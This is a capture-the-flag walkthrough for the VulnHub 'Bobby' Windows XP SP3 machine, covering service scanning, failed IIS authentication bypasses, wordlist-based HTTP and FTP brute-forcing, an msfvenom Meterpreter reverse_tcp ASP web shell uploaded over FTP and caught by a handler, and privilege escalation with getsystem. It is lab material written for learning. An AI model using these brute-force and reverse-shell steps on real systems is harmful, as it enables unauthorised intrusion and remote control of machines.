The Bobby CTF is based on a Windows XP Pro SP3 VM with the objective of retrieving the flag found somewhere within the administrator’s personal folder.

The VM can be downloaded from VulnHub and must be setup using VulnInjector, due to the licensing implications of providing a free Windows VM.

Service Fingerprinting

As the virtual machine comes pre-configured with a static IP address of 192.168.1.11, I skipped host discovery and began looking for and fingerprinting services instead.

I loaded up Metasploit [msfconsole] and began an Nmap scan with the sV flags to fingerprint the discovered services:

msf > db_nmap -sV 192.168.1.11
[*] Nmap: Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-03 16:47 BST
[*] Nmap: Nmap scan report for 192.168.1.11
[*] Nmap: Host is up (0.00026s latency).
[*] Nmap: Not shown: 997 filtered ports
[*] Nmap: PORT    STATE  SERVICE VERSION
[*] Nmap: 21/tcp  open   ftp     Microsoft ftpd
[*] Nmap: 80/tcp  open   http    Microsoft IIS httpd 5.1
[*] Nmap: 443/tcp closed https
[*] Nmap: MAC Address: 08:00:27:12:1D:ED (Oracle VirtualBox virtual NIC)
[*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 23.97 seconds

The results showed that the IIS 5.1 HTTP and FTP services were running.

Looking Further into IIS

With IIS 5.1 identified, I used Metasploit to check if WebDAV is enabled, which it wasn’t:

msf > use auxiliary/scanner/http/webdav_scanner
msf auxiliary(webdav_scanner) > hosts -R

Hosts
=====

address       mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------       ---                ----  -------  ---------  -----  -------  ----  --------
192.168.1.11  08:00:27:12:1d:ed        Unknown                    device         

RHOSTS => 192.168.1.11

msf auxiliary(webdav_scanner) > run

[*] 192.168.1.11 (Microsoft-IIS/5.1) WebDAV disabled.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(webdav_scanner) >

I then checked to see what Nikto could find:

root@kali:~# nikto -host 192.168.1.11
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.11
+ Target Hostname:    192.168.1.11
+ Target Port:        80
+ Start Time:         2017-06-03 17:03:17 (GMT1)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/5.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, PUT, DELETE
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-877: HTTP TRACK method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /localstart.asp: This may be interesting...
+ /portal/changelog: Vignette richtext HTML editor changelog found.
+ 7684 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2017-06-03 17:03:33 (GMT1) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The localstart.asp file which Nikto identified requires HTTP authentication in order to view and the change log doesn’t seem to exist.

Next, I ran dirb using the IIS vulnerability word list bundled with Kali:

root@kali:~# dirb http://192.168.1.11 /usr/share/dirb/wordlists/vulns/iis.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jun  3 17:10:39 2017
URL_BASE: http://192.168.1.11/
WORDLIST_FILES: /usr/share/dirb/wordlists/vulns/iis.txt

-----------------

GENERATED WORDS: 58                                                            

---- Scanning URL: http://192.168.1.11/ ----
+ http://192.168.1.11/iisadmin (CODE:403|SIZE:4083)                                                                                                                                                                                                                             
+ http://192.168.1.11/printers (CODE:401|SIZE:4431)                                                                                                                                                                                                                             

-----------------
END_TIME: Sat Jun  3 17:10:39 2017
DOWNLOADED: 58 - FOUND: 2

Both directories that dirb found were not viewable, /iisadmin was seemingly restricted to local access from the server side, and /printers required HTTP authentication; possibly sharing the same credentials as /localstart.asp.

Bypassing HTTP Authentication

A quick search of the Metasploit IIS modules revealed that there is an auxiliary module (auxiliary/admin/http/iis_auth_bypass) which may help bypass the authentication on the URLs found using Nikto and dirb:

This module bypasses basic authentication for Internet Information Services (IIS). By appending the NTFS stream name to the directory name in a request, it is possible to bypass authentication.

The first path I tried this with was /printers, but it failed:

msf auxiliary(iis_auth_bypass) > set RHOST 192.168.1.11
RHOST => 192.168.1.11
msf auxiliary(iis_auth_bypass) > set TARGETURI /printers
TARGETURI => /printers
msf auxiliary(iis_auth_bypass) > run

[-] The bypass attempt did not work
[*] Auxiliary module execution completed

Nor did it work for /localstart.asp

msf auxiliary(iis_auth_bypass) > set TARGETURI /localstart.asp
TARGETURI => /localstart.asp
msf auxiliary(iis_auth_bypass) > run

[-] The bypass attempt did not work
[*] Auxiliary module execution completed

After this module failed to bypass the authentication, I searched around and found CVE-2010-2731; a vulnerability which allows the bypassing of authentication by appending :$i30:$INDEX_ALLOCATION to the end of adirectory name in the GET request. I tried this with both /iisadmin and /printers, but both still prompted for authentication.

HTTP Brute Forcing

As exploiting vulnerabilities to bypass authentication wasn’t working, I used CeWL to create a custom word list based on the home page that was being served from IIS in an attempt to brute force the login.

Given it was the personal page of Bobby with a small bio, there were some keywords that could be picked up and mutated.

root@kali:~# cewl -w bobby_words.txt -v http://192.168.1.11
CeWL 5.3 (Heading Upwards) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Starting at http://192.168.1.11
Visiting: http://192.168.1.11, got response code 200
Attribute text found:


Writing words to file
root@kali:~# cat bobby_words.txt
Favourite
Bobby
TheXero
blog
sounds
more
not
Robert
Bob
Welcome
personal
blogging
website
but
here
are
few
things
about
film
Matrix
reloaded
music
artist
Daft
Punk
Windows
root@kali:~#

I then refactored the word list further to remove unlikely passwords and to include “thematrix” and merge “Daft” and “Punk” together:

Bobby
TheXero
Robert
Bob
Matrix
music
Windows
thematrix
daftpunk

Once the word list was ready, I used the auxiliary/scanner/http/http_login Metasploit module to attempt the brute force, but all attempts failed:

msf > use auxiliary/scanner/http/http_login
msf auxiliary(http_login) > set PASS_FILE bobby_words.txt
PASS_FILE => bobby_words.txt
msf auxiliary(http_login) > set USER_FILE bobby_words.txt
USER_FILE => bobby_words.txt
msf auxiliary(http_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(http_login) > set AUTH_URI /localstart.asp
AUTH_URI => /localstart.asp
msf auxiliary(http_login) > set RHOSTS 192.168.1.11
RHOSTS => 192.168.1.11
msf auxiliary(http_login) > run

****

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Getting FTP Access

All the attempts I had made on the HTTP server had failed, with no clear way to continue on that front, so I moved on to looking into the FTP server to see what was possible.

Searching Metasploit for Windows FTP exploits revealed MS09-053 - a buffer overflow which can lead to remote code execution:

This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP service. The flaw is triggered when a special NLST argument is passed while the session has changed into a long directory path. For this exploit to work, the FTP server must be configured to allow write access to the file system (either anonymously or in conjunction with a real account)

I suspected there’s not much chance that anonymous FTP access would be enabled, but decided to test for it anyway, just in case:

msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > hosts -R

Hosts
=====

address       mac                name          os_name     os_flavor  os_sp  purpose  info  comments
-------       ---                ----          -------     ---------  -----  -------  ----  --------
192.168.1.11  08:00:27:12:1d:ed  192.168.1.11  Windows XP                    client         

RHOSTS => 192.168.1.11

msf auxiliary(anonymous) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As my suspicions were correct, I next decided to try the word list I had previously generated with the FTP server, in case the FTP server and HTTP server weren’t using shared credentials for authentication:

msf > use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > hosts -R

Hosts
=====

address       mac                name          os_name     os_flavor  os_sp  purpose  info  comments
-------       ---                ----          -------     ---------  -----  -------  ----  --------
192.168.1.11  08:00:27:12:1d:ed  192.168.1.11  Windows XP                    client         

RHOSTS => 192.168.1.11

msf auxiliary(ftp_login) > set BRUTEFORCE_SPEED 3
BRUTEFORCE_SPEED => 3
msf auxiliary(ftp_login) > set PASS_FILE bobby_words.txt
PASS_FILE => bobby_words.txt
msf auxiliary(ftp_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(ftp_login) > set USERNAME bobby
USERNAME => bobby
msf auxiliary(ftp_login) > run

[*] 192.168.1.11:21       - 192.168.1.11:21 - Starting FTP login sweep
[-] 192.168.1.11:21       - 192.168.1.11:21 - LOGIN FAILED: bobby:Bobby (Incorrect: )
[-] 192.168.1.11:21       - 192.168.1.11:21 - LOGIN FAILED: bobby:TheXero (Incorrect: )
[-] 192.168.1.11:21       - 192.168.1.11:21 - LOGIN FAILED: bobby:Robert (Incorrect: )
[-] 192.168.1.11:21       - 192.168.1.11:21 - LOGIN FAILED: bobby:Bob (Incorrect: )
[-] 192.168.1.11:21       - 192.168.1.11:21 - LOGIN FAILED: bobby:Matrix (Incorrect: )
[-] 192.168.1.11:21       - 192.168.1.11:21 - LOGIN FAILED: bobby:music (Incorrect: )
[-] 192.168.1.11:21       - 192.168.1.11:21 - LOGIN FAILED: bobby:Windows (Incorrect: )
[-] 192.168.1.11:21       - 192.168.1.11:21 - LOGIN FAILED: bobby:TheMatrix (Incorrect: )
[-] 192.168.1.11:21       - 192.168.1.11:21 - LOGIN FAILED: bobby:DaftPunk (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

No attempts were successful with the username “bobby”, so I proceeded to try again using the usernames “bob” and “robert”, but hit a lockout in the process due to too many incorrect attempts being made (“Unable to Connnect” == locked out):

msf auxiliary(ftp_login) > set USERNAME bob
USERNAME => bob
msf auxiliary(ftp_login) > run

[*] 192.168.1.11:21       - 192.168.1.11:21 - Starting FTP login sweep
[-] 192.168.1.11:21       - 192.168.1.11:21 - LOGIN FAILED: bob:Bobby (Incorrect: )
[-] 192.168.1.11:21       - 192.168.1.11:21 - LOGIN FAILED: bob:TheXero (Unable to Connect: )
[-] 192.168.1.11:21       - 192.168.1.11:21 - LOGIN FAILED: bob:Robert (Unable to Connect: )
[-] 192.168.1.11:21       - 192.168.1.11:21 - LOGIN FAILED: bob:Bob (Unable to Connect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I waited for 5-10 minutes for the lockout to expire, and then resumed the brute force and managed to get a successful login with bob:Matrix:

msf auxiliary(ftp_login) > run

[*] 192.168.1.11:21       - 192.168.1.11:21 - Starting FTP login sweep
[-] 192.168.1.11:21       - 192.168.1.11:21 - LOGIN FAILED: bob:Bobby (Incorrect: )
[-] 192.168.1.11:21       - 192.168.1.11:21 - LOGIN FAILED: bob:TheXero (Incorrect: )
[-] 192.168.1.11:21       - 192.168.1.11:21 - LOGIN FAILED: bob:Robert (Incorrect: )
[-] 192.168.1.11:21       - 192.168.1.11:21 - LOGIN FAILED: bob:Bob (Incorrect: )
[+] 192.168.1.11:21       - 192.168.1.11:21 - LOGIN SUCCESSFUL: bob:Matrix
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Getting a Shell

Now that I had a valid set of credentials to login with, I decided to try the previously found buffer overflow exploit, but had no success in getting it to work:

msf > use exploit/windows/ftp/ms09_053_ftpd_nlst
msf exploit(ms09_053_ftpd_nlst) > set FTPUSER bob
FTPUSER => bob
msf exploit(ms09_053_ftpd_nlst) > set FTPPASS Matrix
FTPPASS => Matrix
msf exploit(ms09_053_ftpd_nlst) > set RHOST 192.168.1.11
RHOST => 192.168.1.11
msf exploit(ms09_053_ftpd_nlst) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms09_053_ftpd_nlst) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf exploit(ms09_053_ftpd_nlst) > run

[*] Started reverse TCP handler on 192.168.1.4:4444
[*] 192.168.1.11:21 - 257 "DZPWDEGPWS" directory created.
[*] 192.168.1.11:21 - 250 CWD command successful.
[*] 192.168.1.11:21 - Creating long directory...
[*] 192.168.1.11:21 - 257 "BVP�UURU5UUUU@�8QEPHu�@@@@���PKBFWFVEHNMDOYXKDRRDYQLMVMMHFMROVNDCQBMCIPNIJOOIDTUUMXHGKPHRTZTHQ����UTDJPJZUEGNWVVGWBXHZAFXZSBCSEPORVUYCKJUOZG����������$=w�����ZKNDAKKWCR�f�����OXGJMCTLYOCOUQISFOVKIEN" directory created.
[*] 192.168.1.11:21 - 200 PORT command successful.
[*] 192.168.1.11:21 - Trying target Windows 2000 SP4 English/Italian (IIS 5.0)...
[*] 192.168.1.11:21 - 150 Opening ASCII mode data connection for file list.
[*] Exploit completed, but no session was created.

As this exploit wasn’t working for me, I proceeded to generate a Meterpreter payload manually using msfvenom and uploaded it to the public folder:

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp --format asp LHOST=192.168.1.4 -o shell.asp
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of asp file: 38315 bytes
Saved as: shell.asp

root@kali:~# ftp 192.168.1.11
Connected to 192.168.1.11.
220 Microsoft FTP Service
Name (192.168.1.11:root): bob
331 Password required for bob.
Password:
230 User bob logged in.
Remote system type is Windows_NT.
ftp> cd wwwroot
250 CWD command successful.
ftp> put shell.asp
local: shell.asp remote: shell.asp
200 PORT command successful.
150 Opening ASCII mode data connection for shell.asp.
226 Transfer complete.
38385 bytes sent in 0.00 secs (25.3510 MB/s)
ftp> ls -l
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
12-08-11  01:56PM               272367 backgroup.jpg
12-10-11  02:55PM                  101 hint.html
02-12-13  12:46PM                 1228 index.html
06-03-17  09:14PM                38385 shell.asp
226 Transfer complete.

Whilst checking that shell.asp had uploaded, I noticed there was also a file named hint.html, which I decided to take a look at (even if it was possibly a bit late):

root@kali:~# curl http://192.168.1.11/hint.html
#1 This very common Windows file is not downloaded or interpretered but rather executed server side

I wasn’t (and I am still not) 100% sure what this hint was referring to, so I continued to setup the handler in Metasploit for the reverse shell:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.1.4:4444
[*] Starting the payload handler...

Once the TCP handler was setup and listening for connections, I proceeded to execute the shell script on the server by executing curl http://192.168.1.11/shell.asp and successfully got shell access:

[*] Sending stage (957487 bytes) to 192.168.1.11
[*] Meterpreter session 1 opened (192.168.1.4:4444 -> 192.168.1.11:1038) at 2017-06-03 21:18:03 +0100

meterpreter > sysinfo
Computer        : BOBBY
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

Getting System Privileges

Metasploit provides a very useful command (getsystem) in Meterpreter for Windows sessions, which will automate a variety of privilege escalation methods. My first instinct was to try using this command and on the first attempt, it successfully escalated to the SYSTEM user:

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Now that I had access to the entire file system, I fished around in the administrator’s user folder a bit, found the flag on the desktop, and successfully completed the CTF!

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  32    fil   2013-02-04 22:25:26 +0000  secret.txt

meterpreter > cat secret.txt
ab74f8217d5619acb2b708c7bdc50748